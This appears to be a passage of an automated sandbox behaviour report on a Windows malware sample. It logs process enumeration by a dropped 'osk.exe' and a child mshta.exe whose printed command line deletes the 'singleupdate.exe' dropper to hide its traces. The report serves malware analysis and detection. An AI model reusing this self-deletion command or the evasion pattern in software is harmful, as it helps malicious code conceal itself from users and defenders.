|---|---|---|---|---|---|
| Module | Get Filename | module_name = C:\Users\FD1HVy\AppData\Roaming\osk.EN, process_name = c:\users\fd1hvy\appdata\roaming\osk.exe, file_name_orig = C:\Users\FD1HVy\AppData\Roaming\osk.exe, size = 522 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x75ededc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Heap32ListFirst, address_out = 0x75edf1a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Heap32ListNext, address_out = 0x75edf250 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Heap32First, address_out = 0x75edf2f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Heap32Next, address_out = 0x75edf510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Toolhelp32ReadProcessMemory, address_out = 0x75ea8830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32First, address_out = 0x75edf810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32Next, address_out = 0x75edf9a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75edf750 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x75edf8f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Thread32First, address_out = 0x75edfa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Thread32Next, address_out = 0x75edfb30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Module32First, address_out = 0x75edfc90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Module32Next, address_out = 0x75edfe30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x75edfbd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Module32NextW, address_out = 0x75edfd80 |
|
1 | |
| Process | Enumerate Processes | - |
|
68 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
69 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
69 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
44 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1 | |
| Process | Enumerate Processes | - |
|
1 |
Thread 0xf84
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Get Info | filename = C:\, type = file_attributes |
|
1 |
Process #9: mshta.exe
1866
1
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\windows\syswow64\mshta.exe |
| Command Line | mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('singleupdate.exe');close()}catch(e){}},10);" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:32, Reason: Child Process |
| Unmonitor | End Time: 00:04:11, Reason: Self Terminated |
| Monitor Duration | 00:00:39 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfe4 |
| Parent PID | 0xe64 (c:\users\fd1hvy\desktop\singleupdate.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E0
0x
CE0
0x
9FC
0x
F94
0x
84
0x
86C
0x
EE8
0x
F9C
0x
C48
0x
D98
0x
F40
0x
9E4
0x
824
0x
EA8
0x
F38
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| jscript9.dll | 0x71620000 | 0x719A4FFF | Marked Writable | - | 32-bit | - |
|
|
|
| mshta.exe | 0x01320000 | 0x01327FFF | Forced | - | 32-bit | - |
|
|
|
| buffer | 0x067F0000 | 0x0680FFFF | Marked Executable | - | 32-bit | - |
|
|
|
Threads
Thread 0xe0
521
1
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\mshta.exe, base_address = 0x1320000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapSetInformation, address_out = 0x75ea5850 |
|
1 | |
| Module | Load | module_name = WLDP.DLL, base_address = 0x72dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wldp.dll, function = WldpGetLockdownPolicy, address_out = 0x72dc3c20 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32, data = C:\Windows\SysWOW64\mshtml.dll, type = REG_SZ |
|
1 | |
| Module | Load | module_name = C:\Windows\SysWOW64\mshtml.dll, base_address = 0x726c0000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapSetInformation, address_out = 0x75ea5850 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Environment | Get Environment String | name = JS_DEBUG_SCOPE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ChakraRecycler |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ChakraRecycler |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\mshta.exe, base_address = 0x1320000 |
|
1 | |
| System | Get Time | type = Ticks, time = 222703 |
|
2 | |
| Module | Get Filename | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapSetInformation, address_out = 0x75ea5850 |
|
1 | |
| File | Open Mapping | filename = #MSHTML#PERF#00000FE4, desired_access = FILE_MAP_WRITE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE, value_name = Path, type = REG_NONE |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\mshta.exe, base_address = 0x1320000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\mshta.exe, process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Application Compatibility, value_name = mshta.exe, type = REG_NONE |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RegisterApplicationRestart, address_out = 0x75eb1080 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\mshtml.dll, function = RunHTMLApplication, address_out = 0x7322a7e0 |
|
1 | |
| System | Get Info | - |
|
1 | |
| Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 1938289816 |
|
1 | |
| Window | Create | class_name = HTML Application Host Window Class, wndproc_parameter = 1938289816 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = -16, new_long = -2100363264 |
|
1 | |
| COM | Create | interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Window | Create | wndproc_parameter = 0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x74b70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetCoalescableTimer, address_out = 0x74ba3c80 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\WINDOWS |
|
1 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x72440000 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
3 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, value_name = NoFileMenu |
|
1 | |
| Ini | Read | file_name_orig = Win.ini, section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11 |
|
1 | |
| System | Get Time | type = Ticks, time = 226437 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22647284250 |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID_NAME, result_out = 00000409 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x74100000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\urlmon.dll, function = 471, address_out = 0x741845d0 |
|
1 | |
| Module | Load | module_name = WLDP.DLL, base_address = 0x72360000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wldp.dll, function = WldpGetLockdownPolicy, address_out = 0x72363c20 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22731453167 |
|
1 | |
| System | Get Time | type = System Time, time = 2019-04-12 09:18:00 (UTC) |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22731465438 |
|
1 | |
| URL | Query Info | url = javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('singleupdate.exe');close()}catch(e){}},10);, query_options = QUERY_IS_SECURE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Parental Controls\Users\S-1-5-21-1051304884-625712362-2192934891-1000 |
|
1 | |
| COM | Create | interface = 08C0E040-62D1-11D1-9326-0060B067B86E, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD |
|
1 | |
| Window | Create | wndproc_parameter = 79822848 |
|
1 | |
| Window | Set Attribute | index = -21, new_long = 79822848 |
|
1 | |
| Module | Load | module_name = ext-ms-win-ntuser-touch-hittest-l1-1-0.dll, base_address = 0x74b70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterTouchHitTestingWindow, address_out = 0x74ba3b50 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22771456252 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22771539293 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22771564801 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22771569811 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22771575282 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22771603438 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22771639492 |
|
1 | |
| System | Get Time | type = Ticks, time = 227687 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 22771752393 |
|
1 | |
| Window | Create | wndproc_parameter = 79725264 |
|
1 | |
| Window | Set Attribute | index = -21, new_long = 79725264 |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, SEC_COMMIT, maximum_size = 40 |
|
1 | |
| Module | Map | process_name = c:\windows\syswow64\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ |
|
1 | |
| Module | Map | process_name = c:\windows\syswow64\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| Module | Load | module_name = OLEACC.DLL, base_address = 0x71f20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleacc.dll, function = LresultFromObject, address_out = 0x71f2f590 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 849, y_out = 234 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 849, y_out = 234 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Module | Load | module_name = mshtml.dll, base_address = 0x726c0000 |
|
2 | |
| System | Get Time | type = Performance Ctr, time = 23524349695 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 23524498158 |
|
1 | |
| COM | Create | interface = BB1A2AE1-A4F9-11CF-8F20-00805F2CD064, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = JS_DEBUG_SCOPE |
|
1 | |
| Debug | Check for Presence | c:\windows\syswow64\mshta.exe |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\Windows\System32\jscript9.dll, size = 260 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\JScriptLegacy |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\JScriptLegacy |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x74f71cd0 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24275486169 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24275501536 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24275519326 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24275533126 |
|
1 | |
| System | Get Time | type = Performance Ctr, time = 24275550449 |
|
1 | |
